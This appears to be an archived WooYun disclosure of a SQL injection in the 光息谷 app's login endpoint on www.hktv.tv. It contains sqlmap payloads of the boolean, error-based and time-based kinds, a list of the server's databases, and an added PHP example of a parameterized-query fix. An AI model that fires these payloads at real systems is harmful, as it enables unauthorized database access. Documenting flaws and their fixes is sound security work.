WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
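2015-05-18: Details reported to the vendor; awaiting vendor response
2015-05-18: Vendor confirmed; details disclosed to the vendor only
2015-05-28: Details disclosed to core white hats and experts in related fields
2015-06-07: Details disclosed to regular white hats
2015-06-17: Details disclosed to intern white hats
2015-07-02: Details disclosed to the public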
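光息谷 is an app operated by 云视. Its login endpoint is vulnerable to SQL injection through a POST parameter. The request below was captured from the app's traffic: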
POST /e/extend/new_client_api/login.php HTTP/1.1
Host: www.hktv.tv
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 29
Connection: keep-alive
User-Agent: 光息谷 2.9 (iPhone; iPhone OS 8.3; zh_CN)

loginname=11111&password=dddd
Proof:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: loginname
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: loginname=-3492' OR (1250=1250)#&password=qq

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: loginname=111' AND (SELECT 5229 FROM(SELECT COUNT(*),CONCAT(0x3a666d723a,(SELECT (CASE WHEN (5229=5229) THEN 1 ELSE 0 END)),0x3a6b71653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'msMy'='msMy&password=qq

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: loginname=111' AND 6592=BENCHMARK(5000000,MD5(0x4d655476)) AND 'pVCW'='pVCW&password=qq
---
[17:06:06] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
[17:06:06] [INFO] fetched data logged to text files under 'D:\sqlmap\output\www.hktv.tv'

[*] shutting down at 17:06:06
Database information:
available databases [24]:
[*] bbs_hktv
[*] cdp
[*] cms_as
[*] cms_hktv
[*] information_schema
[*] jsbc-security
[*] meicam
[*] mysql
[*] odp
[*] onairfastedit
[*] onairtranscode
[*] ors
[*] performance_schema
[*] security_as
[*] security_hktv
[*] security_hn
[*] vms
[*] vms_as
[*] vms_hktv
[*] vms_jyg
[*] vms_sjs
[*] wechat_hn
[*] wechat_sjs
[*] yicloud_aliyun_rds_dummy_database
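
The finding above is that the loginname POST field reaches the MySQL query as SQL text. As an added example (not code from this report or from the vendor), here is a login lookup that binds the value as a parameter instead. The users table, its columns, the function names and the use of in-memory SQLite in place of MySQL are assumptions; it needs PHP 7+ with pdo_sqlite.

```php
<?php
// Added example, not the vendor's code. Table and column names are hypothetical.
// In-memory SQLite stands in for the MySQL back end so the script runs offline;
// on MySQL also set PDO::ATTR_EMULATE_PREPARES to false for server-side binding.

function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (loginname TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)');
    $ins = $pdo->prepare('INSERT INTO users (loginname, pw_hash) VALUES (?, ?)');
    // Constructed account matching the captured request body.
    $ins->execute(['11111', password_hash('dddd', PASSWORD_DEFAULT)]);
    return $pdo;
}

function login(PDO $pdo, string $body): bool
{
    parse_str($body, $form); // decode application/x-www-form-urlencoded
    $name = $form['loginname'] ?? null;
    $pass = $form['password'] ?? null;
    // Reject missing fields, array-typed fields (loginname[]=x) and oversized input.
    if (!is_string($name) || !is_string($pass) || strlen($name) > 255) {
        return false;
    }
    // The value travels as a bound parameter and is never spliced into the SQL text.
    $stmt = $pdo->prepare('SELECT pw_hash FROM users WHERE loginname = :name');
    $stmt->execute([':name' => $name]);
    $hash = $stmt->fetchColumn(); // false when no row matches
    return is_string($hash) && password_verify($pass, $hash);
}

$pdo = open_demo_db();
$bodies = [
    'loginname=11111&password=dddd', // request body captured on the page
    "loginname=-3492' OR (1250=1250)#&password=qq", // boolean-based payload from the page
    // time-based payload from the page
    "loginname=111' AND 6592=BENCHMARK(5000000,MD5(0x4d655476)) AND 'pVCW'='pVCW&password=qq",
];
foreach ($bodies as $body) {
    printf("%-5s %s\n", login($pdo, $body) ? 'ALLOW' : 'DENY', $body);
}
```

With binding, the quoted payloads are compared as literal login names, match no row, and are denied; only the constructed account's own credentials are accepted.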
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-05-18 17:25
Thank you for your attention; we will fix this as soon as possible.
None yet